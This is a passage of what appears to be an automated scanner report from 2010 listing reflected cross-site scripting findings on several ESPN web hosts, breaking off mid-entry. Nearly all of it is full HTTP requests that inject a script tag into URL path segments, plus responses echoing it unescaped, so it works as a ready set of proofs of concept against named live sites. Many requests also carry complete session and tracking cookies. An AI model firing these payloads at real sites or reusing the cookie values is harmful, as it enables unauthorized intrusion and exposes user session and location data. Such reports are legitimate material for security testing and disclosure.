This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/css/main91bdc<script>alert(1)</script>182530dbb64 HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:35 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/css/main91bdc<script>alert(1)</script>182530dbb64</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a89ef<script>alert(1)</script>59ae141c417 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/statica89ef<script>alert(1)</script>59ae141c417/js/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 146 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:34 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/statica89ef<script>alert(1)</script>59ae141c417/js/main</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d1cb<script>alert(1)</script>4c687beadc5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/js5d1cb<script>alert(1)</script>4c687beadc5/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 146 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:37 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/js5d1cb<script>alert(1)</script>4c687beadc5/main</BODY></HTML>
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd44f<script>alert(1)</script>1c2bc0e9cef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/js/maincd44f<script>alert(1)</script>1c2bc0e9cef HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 146 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:41 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/js/maincd44f<script>alert(1)</script>1c2bc0e9cef</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b155<script>alert(1)</script>4134dc3e7cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage7b155<script>alert(1)</script>4134dc3e7cb HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 131 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage7b155<script>alert(1)</script>4134dc3e7cb</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f36c<script>alert(1)</script>45bed4dd97c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage9f36c<script>alert(1)</script>45bed4dd97c/basketball HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 142 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage9f36c<script>alert(1)</script>45bed4dd97c/basketball</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7707<script>alert(1)</script>fed908440a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage/basketballb7707<script>alert(1)</script>fed908440a5 HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 142 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage/basketballb7707<script>alert(1)</script>fed908440a5</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd1f8<script>alert(1)</script>3870a2a6f26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/endd1f8<script>alert(1)</script>3870a2a6f26/frontpage HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17807 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/endd1f8<script>alert(1)</script>3870a2a6f26/frontpage</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cad91<script>alert(1)</script>aea9d8a4290 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/frontpagecad91<script>alert(1)</script>aea9d8a4290 HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17804 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/frontpagecad91<script>alert(1)</script>aea9d8a4290</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a748f<script>alert(1)</script>f8c10452a72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/ena748f<script>alert(1)</script>f8c10452a72/group HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17803 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/ena748f<script>alert(1)</script>f8c10452a72/group</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d225d<script>alert(1)</script>ba2a1fa4d8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/groupd225d<script>alert(1)</script>ba2a1fa4d8d HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17800 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/groupd225d<script>alert(1)</script>ba2a1fa4d8d</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60154<script>alert(1)</script>a8449528d68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/en60154<script>alert(1)</script>a8449528d68/story HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17803 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/en60154<script>alert(1)</script>a8449528d68/story</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 98bbc<script>alert(1)</script>d41001c2763 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/story98bbc<script>alert(1)</script>d41001c2763 HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: maxage=0 Connection: close Content-Length: 17800 Content-Type: text/html; charset=iso-8859-1 Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/story98bbc<script>alert(1)</script>d41001c2763</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a591<script>alert(1)</script>4469738f57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/blog1a591<script>alert(1)</script>4469738f57 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 133 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/blog1a591<script>alert(1)</script>4469738f57</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2f55<script>alert(1)</script>52656a339f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/indexf2f55<script>alert(1)</script>52656a339f6 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
